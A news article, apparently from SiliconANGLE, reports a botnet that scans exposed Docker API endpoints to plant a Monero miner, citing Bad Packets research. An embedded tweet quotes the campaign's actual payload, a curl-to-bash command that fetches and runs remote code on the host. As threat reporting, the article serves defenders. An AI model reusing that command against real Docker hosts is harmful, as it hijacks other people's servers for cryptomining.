Unknown hackers have launched a new campaign that’s actively scanning for vulnerable Docker application container instances to inject cryptomining code.
Discovered by cybersecurity firm Bad Packets LLC, the group is actively scanning for vulnerable Docker instances that have application programming interface endpoints exposed to the internet.
Although efforts by hackers to find and hijack servers are common, this case is specifically notable because of the volume: Those behind it are scanning more than 59,000 IP networks in an attempt to identify vulnerable instances.
“What set this campaign apart was the large uptick of scanning activity,” Troy Mursch, chief research officer and co-founder of Bad Packets, told ZDNet Tuesday. “This alone warranted further investigation to find out what this botnet was up to. This isn’t your average script kiddie exploit attempt. There was a moderate level of effort put into this campaign, and we haven’t fully analyzed every single thing it does as of yet.”
Once a vulnerable Docker instance is located, a command is run to install the XMRRig script that hijacks the server to mine for the Monero cryptocurrency.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
“Command”: “chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;'”,#threatintel pic.twitter.com/vxszV5SF1o
— Bad Packets Report (@bad_packets) November 25, 2019
Monero has long been the favorite cryptocurrency of hackers. Unlike bitcoin and other cryptocurrencies that use a public blockchain, thus making transactions traceable, Monero is private and difficult if not impossible to trace.
This isn’t the first time Docker has been targeted by those attempting to install cryptomining code. In March, unpatched Docker hosts were targeted using a runC vulnerability with access also gained by Docker’s remote API being open and public, and Monero mining software was installed.
And Last month, a cryptojacking worm dubbed “Gradoid” was spotted in the wild after spreading to more than 2,000 unsecured Docker hosts. If this sounds repetitive, it should. The hackers exploited Docker vulnerabilities to install Monero cryptomining code.
In this new campaign, as of Tuesday the miners may have been actively scanning but had yet to profit much. Mursch estimates that have managed to mine only 14.82 Monero (XMR), worth about $832.
Users running Docker instances are being advised to check if they’re exposing their API endpoints and, if they are, to close the ports and terminate unrecognized running containers.
Since you’re here …
Show your support for our mission by our 1-click subscribe to our YouTube Channel (below) — The more subscribers we have the more then YouTube’s algorithm promotes our content to users interested in #EnterpriseTech. Thank you.
Support Our Mission: >>>>>> SUBSCRIBE NOW >>>>>> to our Youtube Channel
… We’d like to tell you about our mission and how you can help us fulfill it. SiliconANGLE Media Inc.’s business model is based on the intrinsic value of the content, not advertising. Unlike many online publications, we don’t have a paywall or run banner advertising, because we want to keep our journalism open, without influence or the need to chase traffic.The journalism, reporting and commentary on SiliconANGLE — along with live, unscripted video from our Silicon Valley studio and globe-trotting video teams at theCUBE — take a lot of hard work, time and money. Keeping the quality high requires the support of sponsors who are aligned with our vision of ad-free journalism content.